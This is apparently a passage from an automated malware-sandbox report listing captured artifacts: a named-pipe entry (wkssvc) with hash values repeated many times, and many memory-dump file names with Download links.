cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/112-112-0x0000000000000000-mapping.dmp

Download
memory/316-121-0x0000000000000000-mapping.dmp

Download
memory/316-80-0x0000000000000000-mapping.dmp

Download
memory/336-79-0x0000000000000000-mapping.dmp

Download
memory/360-88-0x0000000000000000-mapping.dmp

Download
memory/556-119-0x0000000000000000-mapping.dmp

Download
memory/556-90-0x0000000000000000-mapping.dmp

Download
memory/564-126-0x0000000000000000-mapping.dmp

Download
memory/576-120-0x0000000000000000-mapping.dmp

Download
memory/580-77-0x0000000000000000-mapping.dmp

Download
memory/620-118-0x0000000000000000-mapping.dmp

Download
memory/656-122-0x0000000000000000-mapping.dmp

Download
memory/752-116-0x0000000075891000-0x0000000075893000-memory.dmp

Filesize
8KB

Download
memory/752-69-0x0000000000000000-mapping.dmp

Download
memory/784-94-0x0000000000000000-mapping.dmp

Download
memory/792-72-0x0000000000000000-mapping.dmp

Download
memory/816-125-0x0000000000000000-mapping.dmp

Download
memory/816-67-0x0000000000000000-mapping.dmp

Download
memory/864-62-0x0000000004610000-0x0000000004611000-memory.dmp

Filesize
4KB

Download
memory/864-60-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/904-113-0x0000000000000000-mapping.dmp

Download
memory/912-75-0x0000000000000000-mapping.dmp

Download
memory/924-127-0x0000000000000000-mapping.dmp

Download
memory/944-99-0x0000000000000000-mapping.dmp

Download
memory/952-85-0x0000000000000000-mapping.dmp

Download
memory/956-106-0x0000000000000000-mapping.dmp

Download
memory/960-76-0x0000000000000000-mapping.dmp

Download
memory/960-111-0x0000000000000000-mapping.dmp

Download
memory/980-105-0x0000000000000000-mapping.dmp

Download
memory/1000-92-0x0000000000000000-mapping.dmp

Download
memory/1048-86-0x0000000000000000-mapping.dmp

Download
memory/1064-96-0x0000000000000000-mapping.dmp

Download
memory/1092-78-0x0000000000000000-mapping.dmp

Download
memory/1148-104-0x0000000000000000-mapping.dmp

Download
memory/1164-115-0x0000000000000000-mapping.dmp

Download
memory/1284-91-0x0000000000000000-mapping.dmp

Download
memory/1316-81-0x0000000000000000-mapping.dmp

Download
memory/1356-97-0x0000000000000000-mapping.dmp

Download
memory/1424-108-0x0000000000000000-mapping.dmp

Download
memory/1432-84-0x0000000000000000-mapping.dmp

Download
memory/1432-109-0x0000000000000000-mapping.dmp

Download
memory/1444-68-0x0000000000000000-mapping.dmp

Download
memory/1448-63-0x0000000000000000-mapping.dmp

Download
memory/1484-65-0x0000000000000000-mapping.dmp

Download
memory/1524-128-0x0000000000000000-mapping.dmp

Download
memory/1524-137-0x0000000005280000-0x0000000005281000-memory.dmp

Filesize
4KB

Download
memory/1524-133-0x00000000048B0000-0x00000000048B1000-memory.dmp

Filesize
4KB

Download
memory/1524-130-0x00000000022D0000-0x00000000022D1000-memory.dmp

Filesize
4KB

Download
memory/1524-131-0x00000000048F0000-0x00000000048F1000-memory.dmp

Filesize
4KB

Download
memory/1524-89-0x0000000000000000-mapping.dmp

Download
memory/1524-134-0x00000000048B2000-0x00000000048B3000-memory.dmp

Filesize
4KB

Download
memory/1524-132-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1528-71-0x0000000000000000-mapping.dmp

Download
memory/1536-93-0x0000000000000000-mapping.dmp

Download
memory/1552-110-0x0000000000000000-mapping.dmp

Download
memory/1560-107-0x0000000000000000-mapping.dmp

Download
memory/1560-73-0x0000000000000000-mapping.dmp

Download
memory/1564-100-0x0000000000000000-mapping.dmp

Download
memory/1584-64-0x0000000000000000-mapping.dmp

Download
memory/1616-98-0x0000000000000000-mapping.dmp

Download
memory/1644-82-0x0000000000000000-mapping.dmp

Download
memory/1660-124-0x0000000000000000-mapping.dmp

Download
memory/1688-102-0x0000000000000000-mapping.dmp

Download
memory/1688-66-0x0000000000000000-mapping.dmp

Download
memory/1692-101-0x0000000000000000-mapping.dmp

Download
memory/1740-87-0x0000000000000000-mapping.dmp

Download
memory/1760-123-0x0000000000000000-mapping.dmp

Download
memory/1888-70-0x0000000000000000-mapping.dmp

Download
memory/1988-95-0x0000000000000000-mapping.dmp

Download
memory/1992-74-0x0000000000000000-mapping.dmp

Download
memory/1992-103-0x0000000000000000-mapping.dmp

Download
memory/2004-83-0x0000000000000000-mapping.dmp

Download
memory/2004-114-0x0000000000000000-mapping.dmp

Download